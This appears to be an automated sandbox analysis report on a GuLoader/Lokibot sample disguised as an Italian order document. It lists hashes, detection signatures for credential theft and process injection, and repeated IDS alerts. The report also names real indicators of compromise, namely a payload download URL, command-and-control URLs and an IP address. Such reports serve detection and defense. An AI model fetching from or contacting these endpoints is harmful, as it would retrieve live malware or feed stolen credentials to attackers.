Loading ...

Play interactive tourEdit tour

Windows Analysis Report ORDINE + DDT A.M.F SpA.exe

Overview

General Information

Sample Name:ORDINE + DDT A.M.F SpA.exe
Analysis ID:528460
MD5:f5423b7a89876044078cbb68db883af8
SHA1:24c550c47d26090f298fea030d7fb890c94737a5
SHA256:68a315123349444d30fed12643a7be20eb003531a4b95d0db800fb765449037d
Infos:

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • ORDINE + DDT A.M.F SpA.exe (PID: 4632 cmdline: "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" MD5: F5423B7A89876044078CBB68DB883AF8)
    • ORDINE + DDT A.M.F SpA.exe (PID: 8108 cmdline: "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" MD5: F5423B7A89876044078CBB68DB883AF8)
      • lsass.exe (PID: 120 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://fabricraft.co.za/Farmant_hhVNwJna195.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: ORDINE + DDT A.M.F SpA.exe PID: 8108JoeSecurity_Lokibot_1Yara detected LokibotJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" , ParentImage: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe, ParentProcessId: 8108, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 120

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://fabricraft.co.za/Farmant_hhVNwJna195.bin"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: ORDINE + DDT A.M.F SpA.exeVirustotal: Detection: 21%Perma Link
        Antivirus detection for URL or domainShow sources
        Source: https://farmanat.ro/arman30/five/fre.phpAvira URL Cloud: Label: malware
        Source: http://farmanat.ro/arman30/five/fre.phpAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URLShow sources
        Source: farmanat.roVirustotal: Detection: 10%Perma Link
        Source: https://farmanat.ro/arman30/five/fre.phpVirustotal: Detection: 11%Perma Link
        Source: http://farmanat.ro/arman30/five/fre.phpVirustotal: Detection: 10%Perma Link
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: unknownHTTPS traffic detected: 197.242.150.64:443 -> 192.168.11.20:49816 version: TLS 1.2

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49817 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49821 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49821 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49822 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49823 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49824 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49825 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49826 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49828 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49844 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49845 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49846 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49847 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49848 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49849 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49850 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49851 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49852 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49853 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49854 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49855 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49856 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49857 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49858 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49859 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49860 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49861 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49862 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49863 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49864 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49865 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49866 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49867 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49869 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49870 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49871 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49872 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49873 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49874 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49875 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49876 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49877 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49878 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49879 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49880 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49881 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49882 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49882 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49882 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49882 -> 176.223.209.128:80
